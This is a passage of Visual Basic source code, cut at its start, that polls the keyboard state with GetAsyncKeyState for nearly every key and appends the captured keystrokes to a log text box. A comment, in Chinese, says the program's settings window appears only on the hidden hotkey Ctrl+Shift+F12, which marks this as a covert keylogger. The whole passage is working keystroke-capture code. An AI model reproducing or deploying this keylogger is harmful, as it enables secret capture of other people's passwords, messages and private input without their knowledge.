txtKeyLog.Text = txtKeyLog.Text + ")"

End If


lngKeyState = GetAsyncKeyState(vbKeyBack)

If (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "{BackSpace}"

End If


lngKeyState = GetAsyncKeyState(vbKeyTab)

If (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "{Tab}"

End If


lngKeyState = GetAsyncKeyState(vbKeyReturn)

If (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + vbCrLf

End If


lngKeyState = GetAsyncKeyState(vbKeyShift)

If (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "{Shift}"

End If


lngKeyState = GetAsyncKeyState(vbKeyControl)

If (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "{Ctrl}"

End If


lngKeyState = GetAsyncKeyState(vbKeyMenu)

If (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "{Alt}"

End If


lngKeyState = GetAsyncKeyState(vbKeyPause)

If (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "{Pause}"

End If


lngKeyState = GetAsyncKeyState(vbKeyEscape)

If (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "{Esc}"

End If


lngKeyState = GetAsyncKeyState(vbKeySpace)

If (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + " "

End If


lngKeyState = GetAsyncKeyState(vbKeyEnd)

If (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "{End}"

End If


lngKeyState = GetAsyncKeyState(vbKeyHome)

If (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "{Home}"

End If


lngKeyState = GetAsyncKeyState(vbKeyLeft)

If (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "{Left}"

End If


lngKeyState = GetAsyncKeyState(vbKeyRight)

If (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "{Right}"

End If


lngKeyState = GetAsyncKeyState(vbKeyUp)

If (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "{Up}"

End If


lngKeyState = GetAsyncKeyState(vbKeyDown)

If (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "{Down}"

End If


lngKeyState = GetAsyncKeyState(vbKeyInsert)

If (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "{Insert}"

End If


lngKeyState = GetAsyncKeyState(vbKeyDelete)

If (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "{Delete}"

End If


lngKeyState = GetAsyncKeyState(&HBA)

If lngShift = 0 And (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + ";"

End If

If lngShift <> 0 And (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + ":"

End If


lngKeyState = GetAsyncKeyState(&HBB)

If lngShift = 0 And (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "="

End If

If lngShift <> 0 And (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "+"

End If


lngKeyState = GetAsyncKeyState(&HBC)

If lngShift = 0 And (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + ","

End If

If lngShift <> 0 And (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "<"

End If


lngKeyState = GetAsyncKeyState(&HBD)

If lngShift = 0 And (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "-"

End If

If lngShift <> 0 And (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "_"

End If


lngKeyState = GetAsyncKeyState(&HBE)

If lngShift = 0 And (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "."

End If

If lngShift <> 0 And (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + ">"

End If


lngKeyState = GetAsyncKeyState(&HBF)

If lngShift = 0 And (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "/"

End If

If lngShift <> 0 And (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "?"

End If


lngKeyState = GetAsyncKeyState(&HC0)

If lngShift = 0 And (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "`"

End If

If lngShift <> 0 And (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "~"

End If


lngKeyState = GetAsyncKeyState(&HDB)

If lngShift = 0 And (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "]["

End If

If lngShift <> 0 And (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "{"

End If


lngKeyState = GetAsyncKeyState(&HDC)

If lngShift = 0 And (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "\"

End If

If lngShift <> 0 And (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "|"

End If


lngKeyState = GetAsyncKeyState(&HDD)

If lngShift = 0 And (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "]"

End If

If lngShift <> 0 And (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "}"

End If


lngKeyState = GetAsyncKeyState(&HDE)

If lngShift = 0 And (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "'"

End If

If lngShift <> 0 And (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + Chr$(34)

End If


lngKeyState = GetAsyncKeyState(vbKeyMultiply)

If (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "*"

End If


lngKeyState = GetAsyncKeyState(vbKeyDivide)

If (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "/"

End If


lngKeyState = GetAsyncKeyState(vbKeyAdd)

If (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "+"

End If


lngKeyState = GetAsyncKeyState(vbKeySubtract)

If (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "-"

End If


lngKeyState = GetAsyncKeyState(vbKeyDecimal)

If (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "{Del}"

End If


lngKeyState = GetAsyncKeyState(vbKeyF1)

If (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "{F1}"

End If


lngKeyState = GetAsyncKeyState(vbKeyF2)

If (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "{F2}"

End If


lngKeyState = GetAsyncKeyState(vbKeyF3)

If (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "{F3}"

End If


lngKeyState = GetAsyncKeyState(vbKeyF4)

If (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "{F4}"

End If


lngKeyState = GetAsyncKeyState(vbKeyF5)

If (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "{F5}"

End If


lngKeyState = GetAsyncKeyState(vbKeyF6)

If (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "{F6}"

End If


lngKeyState = GetAsyncKeyState(vbKeyF7)

If (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "{F7}"

End If


lngKeyState = GetAsyncKeyState(vbKeyF8)

If (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "{F8}"

End If


lngKeyState = GetAsyncKeyState(vbKeyF9)

If (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "{F9}"

End If


lngKeyState = GetAsyncKeyState(vbKeyF10)

If (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "{F10}"

End If


lngKeyState = GetAsyncKeyState(vbKeyF11)

If (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "{F11}"

End If


lngKeyState = GetAsyncKeyState(vbKeyF12)

If lngShift = 0 And (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "{F12}"

End If

'当按下Ctrl + Shift + F12时出现系统设置画面

If lngShift <> 0 And GetAsyncKeyState(vbKeyControl) And (lngKeyState And &H1) = &H1 Then

frmMain.Visible = True

End If


lngKeyState = GetAsyncKeyState(vbKeyNumlock)

If (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "{NumLock}"

End If


lngKeyState = GetAsyncKeyState(vbKeyScrollLock)

If (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "{ScrollLock}"

End If


lngKeyState = GetAsyncKeyState(vbKeyPrint)

If (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "{PrintScreen}"

End If


lngKeyState = GetAsyncKeyState(vbKeyPageUp)

If (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "{PageUp}"

End If


lngKeyState = GetAsyncKeyState(vbKeyPageDown)

If (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "{PageDown}"

End If


lngKeyState = GetAsyncKeyState(vbKeyNumpad1)

If (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "1"

End If


lngKeyState = GetAsyncKeyState(vbKeyNumpad2)

If (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "2"

End If


lngKeyState = GetAsyncKeyState(vbKeyNumpad3)

If (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "3"

End If


lngKeyState = GetAsyncKeyState(vbKeyNumpad4)

If (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "4"

End If


lngKeyState = GetAsyncKeyState(vbKeyNumpad5)

If (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "5"

End If


lngKeyState = GetAsyncKeyState(vbKeyNumpad6)

If (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "6"

End If


lngKeyState = GetAsyncKeyState(vbKeyNumpad7)

If (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "7"

End If


lngKeyState = GetAsyncKeyState(vbKeyNumpad8)

If (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "8"

End If


lngKeyState = GetAsyncKeyState(vbKeyNumpad9)

If (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "9"

End If


lngKeyState = GetAsyncKeyState(vbKeyNumpad0)

If (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "0"

End If

End Sub


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